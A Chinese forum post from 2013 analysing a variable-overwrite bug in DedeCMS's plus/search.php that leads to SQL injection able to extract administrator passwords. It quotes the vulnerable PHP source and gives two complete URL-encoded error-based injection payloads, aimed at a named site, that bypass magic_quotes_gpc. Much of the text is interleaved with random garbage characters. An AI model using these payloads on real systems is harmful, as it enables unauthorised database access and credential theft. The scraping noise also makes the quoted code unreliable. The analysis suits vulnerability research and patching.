微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
5 G. }6 @$ J- ]' U( @2 j8 _& p& }" q作者: c4rp3nt3r@0x50sec.org2 f' U( V, W9 O3 ~
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
a3 S) j" F0 u3 H4 N7 A4 u , n, P$ E6 n- |( l6 [
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.' f# f# ]: V$ O4 F; Q/ V- k
! U( X. ~0 }! e# A============
! U5 V% Y9 E" i% G* ~! n 9 y2 k; `; c# ]$ [ C$ n
% d' U) T9 A' @& f2 c
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
! U- o) A! A8 _* \ 8 ^0 J, w; [0 [$ q
require_once(dirname(__FILE__).”/../include/common.inc.php”);
$ ~" h+ n( V. srequire_once(DEDEINC.”/arc.searchview.class.php”);
% a! j' _; t1 i. ?5 {* J
- q" h+ B4 V0 o( U( e/ e$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
{/ O9 f3 [- a M& q$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;, x( w) P- C$ J- J* H# N: L
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;/ F0 H5 j, {6 G+ P( ^: }% e. D
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;8 A/ W: q# U- X. m \) I7 ~
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;: V9 ^ K% b s8 A
7 s1 k! a2 k& i! H4 Pif(!isset($orderby)) $orderby=”;
: b& P- |2 ]4 w! ]) r# selse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);3 |( a& R( f( C1 s! |
" U- A" x" [+ {6 A
& m- i# V+ x- a& R! D) W i0 g, {
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;
, |% |" r( B- [: B" pelse $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);" a7 n+ X9 Z: V" }( y
# c& u N; w; S- \
if(!isset($keyword)){
. O1 ]: D7 w- l. a! T6 Y9 s if(!isset($q)) $q = ”;8 c% G5 e E# h- `, w3 |, s4 Q
$keyword=$q;" ~3 @& p+ K. ~* S1 }/ m5 ^/ N
}' B, m) W; e# f1 J* A' _
6 M: O; K$ l9 P% ^. n1 l( A8 Y$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));6 _9 F" P r( i% g2 [; p
# b1 L2 K% Y6 u0 K/ L
//查找栏目信息
" Y0 L# k( r1 X7 s, Jif(empty($typeid)): X# f# a: T$ D2 m- H
{; t/ A# N1 u' _- B
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
+ N n& t; @$ b) y3 Y; { if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )9 X& ~) l' E! G5 e D# O
{
7 H! [ A, p5 @0 A: { $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
/ g6 w+ F* i# X fwrite($fp, “<”.”?php\r\n”);
$ h z% ^+ K# n& B" R1 S9 } $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
9 E4 c+ i& W7 L D2 g $dsql->Execute();9 W' n9 b' R& U8 ~9 Y, C
while($row = $dsql->GetArray())9 e8 ^- w) r5 Q W; n' T( ^
{
+ R: Z3 W7 T# L9 D1 w0 Q fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
3 X& L: ` v* @$ L- y2 j }
9 @4 u# b7 U9 F" W fwrite($fp, ‘?’.'>’);
" m* S, x' W! F$ ]& N+ `! {$ e fclose($fp);! n- s P3 H( Q4 P2 E0 n% j9 P- o6 T
}9 f! U! f, X# H( t& H A, S0 w
//引入栏目缓存并看关键字是否有相关栏目内容
7 c/ O0 c2 h1 S+ x% h: J require_once($typenameCacheFile);3 a/ b# M0 K- j5 f7 j5 \
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
" i2 o6 k; E4 |* B, |//& f3 X2 g# G4 D9 Y5 w$ h3 r
if(isset($typeArr) && is_array($typeArr))
9 K- p( C3 ]3 T: g' i: _. u {
: n; M0 @8 ?, j! R" v4 h foreach($typeArr as $id=>$typename)
0 u @' |' p* g- m9 i, h { H/ T! P& f5 P1 u+ r0 A7 t
& I6 j" l9 o/ }; C+ @9 m# C9 Z <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过7 T' q) @0 `2 u7 i( h
if($keyword != $keywordn)7 y% m, m1 h- f2 m( L) ^! t6 C5 X
{
$ V- R7 r* W+ y. t O1 J$ l $keyword = $keywordn;: s3 A4 v0 r' V
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
g3 z$ F, O! T5 @( z break;" c2 ~0 e' d5 d* L
}! Y; B' y3 L* t2 Y4 K/ R5 A u( E
}& o0 W" b4 ]- t- M
}
+ k9 ]. v$ v* U6 g* @- v4 o. p}9 b, h, }' ` {% q% P1 U- W
然后plus/search.php文件下面定义了一个 Search类的对象 .4 M! V7 ^0 g0 I$ j: G
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.' X# _7 L. a1 M1 q
$this->TypeLink = new TypeLink($typeid);4 i5 R% o: n; ]7 `+ u& c% o
/ [7 _$ o8 \# t: iTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.0 S/ n; F# M& [8 K7 Y0 \2 C
4 V5 ]$ F/ _) H+ e7 N
class TypeLink
+ C+ i J8 N) [{
4 a% N% p( v2 U! j, D var $typeDir;: o: @+ ^( r N# y) m% T( E
var $dsql;6 G) T4 @7 \4 H% t/ ]
var $TypeID;
# q/ G; H- v1 x1 X! u3 j var $baseDir;
( Y; c3 c3 B% w, A8 l4 ^ var $modDir;
( T& l: q7 q: o; C5 Q* g& r0 Z var $indexUrl;: {$ {9 I. P7 z; [& K
var $indexName;; b, R0 U% Z" R- Q# M. i$ y/ g& I
var $TypeInfos;
5 v: t) E' [1 i var $SplitSymbol;
& D% G" g2 l& u! w var $valuePosition;
+ p3 }( @( x: t* }7 a/ N, q: P$ _ var $valuePositionName;+ D& ]% n/ `0 g6 L# Z. M
var $OptionArrayList;//构造函数///////
- X! b; ~; M5 V //php5构造函数
9 ~& A( W, z( b4 ], J function __construct($typeid)" o+ k; P/ Y$ L) f8 `: N( V+ a' x; I
{
. E3 n* j$ q5 B& W# B$ d $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
8 W7 y( u4 c* [6 m ^6 c/ J9 _ $this->indexName = $GLOBALS['cfg_indexname'];
% m) r( S/ i1 y+ l7 y $this->baseDir = $GLOBALS['cfg_basedir'];- R3 }4 t( u& N1 E- g
$this->modDir = $GLOBALS['cfg_templets_dir'];. @; i w! M6 i' ~
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];; V7 U) o/ B) O8 r- D' M; A O
$this->dsql = $GLOBALS['dsql'];/ M- @5 m3 P: m7 U* J7 }
$this->TypeID = $typeid;
" }- q" G/ d( l( g( E% s2 ? $this->valuePosition = ”;7 i7 Q5 x. y4 L4 N
$this->valuePositionName = ”;
/ _( G2 a/ ^: q+ {( q, g% \ $this->typeDir = ”;2 A6 ?; A8 A& u6 \5 H& E/ C8 q/ x
$this->OptionArrayList = ”;
3 k5 {; f# O R
/ U- j+ y6 G. ^$ a //载入类目信息
8 j9 |" s) d" ~: ]- `9 m
$ ~+ Y) L: O1 O <font color=”Red”>$query = “SELECT tp.*,ch.typename as( U4 r- I3 M8 s3 G: ^& P. ]
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join# x5 `. |7 `6 s
`#@__channeltype` ch$ X x' G" ~! E; n1 H, F
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿
3 U8 d! L6 x: L) C9 t$ K
7 Y `) ~1 i/ h if($typeid > 0); E& F. O) P, W+ b% }* P, Q! {
{ @7 D G" }1 @9 j( i
$this->TypeInfos = $this->dsql->GetOne($query);
6 K7 B4 h8 r$ f! H7 C+ h7 d利用代码一 需要 即使magic_quotes_gpc = Off
2 }* b# N6 k: A, Y4 d& Z
8 c/ ^0 y1 B( fwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title- g0 \: C/ y% G
, J; [; b3 f/ k/ [4 `& h# i& u Q这只是其中一个利用代码… Search 类的构造函数再往下4 B! a' T/ z, E
6 {, \! U! j w8 z- t" G1 |……省略3 Q& w' z' n9 E) i& _, P+ A
$this->TypeID = $typeid;! I& }, M$ T$ g9 e- O x) B$ p6 A7 V
……省略5 Y% w+ `# V. C2 |
if($this->TypeID==”0″){2 R7 g1 @/ j. E2 H, P
$this->ChannelTypeid=1;
/ {0 |% [7 y' `( m( O" S }else{
# H7 S7 X. N8 a- F $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲9 d Y5 \) A# i6 J) _2 ^ U r
//现在不鸡肋了吧亲…7 n, }% Z* m4 I4 }' Y* o. G" W
$this->ChannelTypeid=$row['channeltype']; z' y2 \$ c/ K( B& c
4 Z0 V" u8 S8 k W0 E2 M
}
3 ?/ v4 K# v) W! W利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
% G1 F- D& |$ L2 b
* i7 ]* G9 T5 n' [+ f& Mwww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title) l6 O9 P8 A4 B5 C; c7 b
; v# ^5 K' Q3 K4 f0 p5 y3 N, i
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站8 ^5 c+ ^4 h D% c7 s
|
发表于 2013-1-19 08:18:56
收藏
支持
反对